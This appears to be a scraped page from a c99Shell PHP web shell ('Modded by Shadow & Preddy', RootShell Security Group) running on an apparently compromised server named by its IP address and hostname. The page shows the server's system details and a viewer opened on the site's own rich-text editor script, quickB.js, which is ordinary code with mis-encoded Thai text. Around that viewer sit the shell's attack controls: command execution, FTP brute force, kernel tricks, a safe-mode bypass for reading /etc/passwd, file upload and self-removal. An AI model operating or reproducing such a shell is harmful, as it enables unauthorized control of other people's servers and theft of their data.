110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/editor/ drwxr-xr-x Free 52.66 GB of 127.8 GB (41.2%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/editor/ drwxr-xr-x
Free 52.66 GB of 127.8 GB (41.2%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

" str = str.replace(/IURL/g, iurl); return str ; } function createEditor(id,wi,hi) { var strx = "" var idA= id.split('VDevID') strx += "" var str="

Viewing file: quickB.js (23.38 KB) -rw-r--r--
Select action/file-type:
(+) | (+) |

(+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

var fID; //*** IFRAME ID var TXTOBJ; //*** TEXT Obj var format = new Array(); var viewm = new Array(); /**************************************/ document.onmousedown=doMousedown document.onmouseup=doMouseup function changetoIframeEditor(el) { var wi= '', hi= ''; if(el.style.height) hi= " height=" + el.style.height else if(el.rows) hi= " height=" + (14*el.rows+28) if(el.style.width) wi= " width=" + el.style.width else if(el.cols) wi= " width=" + (6*el.cols +25) var parent= el.parentElement while(parent.tagName != 'FORM') parent= parent.parentElement var oform= parent var fidx=0; while(document.forms[fidx] != oform) fidx++ ; // form index var val='' if(el.tagName=='TEXTAREA'){ fID= fidx+'VDevID'+el.name; val= el.innerText } else fID= fidx+'VDevID'+el.id var strx = createEditor(fID,wi,hi); el.outerHTML= strx iEditor(fID) if(el.tagName!='TEXTAREA') return var reg= eval("/
/i") ; if( reg.test(val) ) val= val.replace(/\n/g, ""); else val= val.replace(/\n/g, "
"); val= val.replace(/\r/g, ""); val= val.replace(/\t/g, ""); val= val.replace(/\\/g, "\"); val= val.replace(/\'/g, "'"); setTimeout("document.frames['"+fID+"'].document.body.innerHTML='"+val+"'",200) oform[fID.split('VDevID')[1]].value= val } function iEditor(idF) { var obj=document.frames[idF] obj.document.designMode="On" obj.document.onmousedown= function(){ TXTOBJ=null; fID=idF; FMousedown();} format[idF]='HTML' viewm[idF]=1; } function formatDialogF() { var y = screen.height - parseInt('30em')*14 - 30 var feature = "font-family:Tahoma; font-size:10pt; dialogWidth:30em; dialogHeight:27em; dialogTop:"+y feature+= ";edge:sunken; help:no; status:no" var dialog= QBPATH+'/dialog.html' var arr= showModalDialog(dialog, "visual", feature); if(arr==null) return ; doFormatF(arr) } function FMousedown() { var objF=document.frames[fID]; // if(objF && objF.event && objF.event.button==2) formatDialogF(); var el = objF.event.srcElement doClick(el) } // init all found TEXTAREA in document function changeAllTextareaToEditors() { var i=0; while(document.all.tags('textarea')[i]) { changetoIframeEditor(document.all.tags('textarea')[i]) if(++i>0 && !document.all.tags('textarea')[i] ) i=0; } } // init all found IFRAME in document to Editable function changeAllIframeToEditors() { var i=0; while(document.all.tags('iframe')[i]) { changetoIframeEditor(document.all.tags('iframe')[i]) i++ } } // init only IFRAMEs that have "id=argument of initEditors" // e.g. changeIframeToEditor('id1','id2',...) function changeIframeToEditor() { for(var j=0;j\

" str += controlRows(); str += "

" str += strx + "

" ; return str ; } ///////////////////////////////////////////////////////////////// function doFormatF(arr) { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var cmd = new Array(); cmd = arr.split(',') if(cmd[0]=='SelectAll') selectAll(); else if(cmd[0]=='Swap[Text/HTML]') swapMode(); else if(cmd[0]=='Swap[Uni/View]') swapView(); else if(cmd[0]=='InsertTable') insertTable(); else if(cmd[0]=='TablePropeties') tableProp(); else if(cmd[0]=='CellPropeties') cellProp(); else if(cmd[0]=='InsertLayer') insertDivLayer(); else if(cmd[0]=='EditLayerBorder') editDivBorder(); else if(cmd[0]=='EditLayerFilter') editDivFilter(); else if(cmd[0]=='Emotions') editEmotions(cmd[1],objF); else { var edit=objF.document; if(cmd[0]=='formatBlock') edit.execCommand(cmd[0],false,"<"+cmd[1]+">") else if(cmd[0]=='InsertImage' && !cmd[1] ) { alert('Please notice:\nThe "Picture Source" in follow Dialog must be a URL, not a local address.'); // alert(cmd[0]); // alert(cmd[1]); edit.execCommand(cmd[0],true,"") } else { // alert(cmd[0]); // alert(cmd[1]); edit.execCommand(cmd[0],false,cmd[1]); } } } function editEmotions(wrd,obj) { var caret=obj.document.selection.createRange(); obj.curword=caret.duplicate(); obj.curword.text= wrd + ' ' } function swapView() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() if(format[fID]=="HTML") { objF.document.body.style.fontFamily="Tahoma" objF.document.body.style.fontSize="10pt" objF.document.body.style.color="black" objF.document.body.style.background="#e0e0f0" var strx=objF.document.body.innerHTML if(viewm[fID]) strx=toUnicode(strx) else strx=viewISOCode(strx) format[fID]="Text" } else { var strx=objF.document.body.innerText if(viewm[fID]) strx=toUnicode(strx) else strx=viewISOCode(strx) } objF.document.body.innerText=strx viewm[fID]=1 - viewm[fID] } function swapMode() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() if(format[fID]=="HTML") { var strx=objF.document.body.innerHTML objF.document.body.innerText=strx objF.document.body.style.fontFamily="monospace" objF.document.body.style.fontSize="10pt" objF.document.body.style.color="black" objF.document.body.style.background="#e0e0f0" format[fID]="Text" } else { objF.document.body.style.fontFamily='Tahoma' objF.document.body.style.color="#000000" objF.document.body.style.background="" var strx=objF.document.body.innerText objF.document.body.innerHTML=strx format[fID]="HTML" viewm[fID]=1 } } function selectAll() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var s=objF.document.body.createTextRange() s.execCommand('SelectAll') } function doFormatDialog(file,cmd,arg) { var urlx= QBPATH + '/' + file var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} var arr=showModalDialog(urlx, arg, "font-family:Tahoma; font-size:12px; dialogWidth:30em; dialogHeight:34em; edge:sunken; help:no; status:no"); if(arr !=null) doFormatF(cmd+','+arr) } function selectEmoticon() { doFormatDialog('emoticon.html','InsertImage',QBPATH) } function selectBgColor() { doFormatDialog('selcolor.html','BackColor','') } function selectFgColor() { doFormatDialog('selcolor.html','ForeColor','') } function characters() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus(); var sel = objF.document.selection; if(sel.type=="Control") return var urlx= QBPATH + '/selchar.html' var arr=showModalDialog(urlx, '', "font-family:Tahoma; font-size:12px; dialogWidth:30em; dialogHeight:34em; edge:sunken; help:no; status:no"); if(arr==null) return var arrA = arr.split(';QuIcKbUiLd;') var strx= "" + arrA[1] + "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } function doUploadFile() { var urlx= QBPATH + '/contents_upload.php' var twidth= 0.8*screen.width, theight=190; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"upload","toolbar=no,width=600,height=250,directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function help2() { var urlx= QBPATH + '/iconhelp.html' /* var twidth= 0.1*screen.width, theight=300; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 25*/ var newWin1=window.open(urlx,"help","toolbar=no,width=710,height=700,directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") // newWin1.moveTo(tposx,tposy); newWin1.focus() } function dolinkFile() { var urlx= QBPATH + '/loadlinkgo.php' var twidth= 0.8*screen.width, theight=190; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"linkins","toolbar=no,width=500,height=360,directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function insertLink(linkurl,namelink) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "" + namelink + "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } else { TXTOBJ.focus(); var caret= TXTOBJ.document.selection.createRange() TXTOBJ.curword=caret.duplicate(); var strx= "" + namelink + "," doFormat(strx,caret) } } function insertflash(infla) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "

" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } } function linkins(linkurl,linkname) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "" + linkname + "" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } else { TXTOBJ.focus(); var caret= TXTOBJ.document.selection.createRange() TXTOBJ.curword=caret.duplicate(); var strx= "" + linkname + "," doFormat(strx,caret) } } function linkinimg(linkurl,linkname) { var objF=document.frames[fID]; if(!objF && !TXTOBJ){alert('Please click a text element');return} if( objF ) { objF.focus(); var sel = objF.document.selection; var strx= "

" var Range = sel.createRange(); if(!Range.duplicate) return; Range.pasteHTML(strx); } else { TXTOBJ.focus(); var caret= TXTOBJ.document.selection.createRange() TXTOBJ.curword=caret.duplicate(); var strx= "

" doFormat(strx,caret) } } function field2form(str1) { var str2 var index var lenx index=str1.indexOf('=0) { lenx=str1.length str1=str1.substring(0,index) + "') while(index>=0) { lenx=str1.length str1=str1.substring(0,index) + "" + str1.substring(index+11,lenx) index=str1.indexOf('

') } return str1 } function form2field(str1) { var str2 var index var lenx index=str1.indexOf('=0) { lenx=str1.length str1=str1.substring(0,index) + "') while(index>=0) { lenx=str1.length str1=str1.substring(0,index) + "

" + str1.substring(index+7,lenx) index=str1.indexOf('') } return str1 } function insertDivLayer() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var sel = objF.document.selection; if (sel==null) return var Range = sel.createRange(); var wrd='' ; if(sel.type!="Control") { if(!Range.duplicate) return; objF.curword=Range.duplicate(); wrd= objF.curword.text; if(wrd=='') wrd="ЎГШіТґСєаєФйЕ¤ФЕЎ·ХиЎЕиН§ўйН¤ЗТБаѕЧиНѕФБѕмўйН¤ЗТБ бЕР©С№КТБТГ¶ЄиЗВ¤ШіКГйТ§Л№йТўиТЗўН§¤ШігЛй№иТК№гЁдґй а¤ГЧиН§БЧН·ХиБХНВЩиКТБТГ¶ЄиЗВгЛй¤Шіµєбµи§ЎЕиН§ўйН¤ЗТБ№ХйгЛйґЩґХдґйµСЗµСЗ¤ШіаН§ ЛТЎ¤ШіК№гЁЕН§БН§»ШиБКХиїйТ 3 »ШиБг№а№ЗФаЎаµНГмєТГмґйТ№ЕиТ§бЕйЗЕН§гЄй бµиНВиТЕЧБаЕЧНЎЎЕиН§ўйН¤ЗТБЎиН№·УЕиР" var arr= "

"+ wrd + "

" ; Range.pasteHTML(arr); return } if(Range(0).tagName!='DIV') return var urlx= QBPATH + '/divstyle.html' var twidth= 0.8*screen.width, theight=190; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"divstyle","toolbar=no,width="+ twidth+",height="+ theight+ ",directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function editDivBorder() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var sel = objF.document.selection; if (sel==null || sel.type!='Control') {alert('ЎГШіТаЕЧНЎЎЕиН§ўйН¤ЗТБ·ХиµйН§ЎТГµєбµи§');return} var Range = sel.createRange(); if(Range(0).tagName!='DIV') return var urlx= QBPATH + '/divborder.html' var twidth= 0.8*screen.width, theight=215; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"divborder","toolbar=no,width="+ twidth+",height="+ theight+ ",directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } function editDivFilter() { var objF=document.frames[fID]; if(!objF){alert('Please click to select the editor');return} objF.focus() var sel = objF.document.selection; if (sel==null || sel.type!='Control') {alert('ЎГШіТаЕЧНЎЎЕиН§ўйН¤ЗТБ·ХиµйН§ЎТГµєбµи§');return} var Range = sel.createRange(); if(Range(0).tagName!='DIV') return var urlx= QBPATH + '/divfilter.html' var twidth= 0.8*screen.width, theight=210; var tposx= (screen.width- twidth)/2 var tposy= screen.height- theight - 55 var newWin1=window.open(urlx,"divfilter","toolbar=no,width="+ twidth+",height="+ theight+ ",directories=no,status=no,scrollbars=yes,resizable=no, menubar=no") newWin1.moveTo(tposx,tposy); newWin1.focus() } /**** From Html-Code to UNICODE ***********/ function viewISOCode(str1) { var c0, str2='', strx='', idx; idx=str1.indexOf('&#') if(idx<0) return str1 var i=0 while (i4 : no Visual-Editor, only use Rightmouse-Control

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--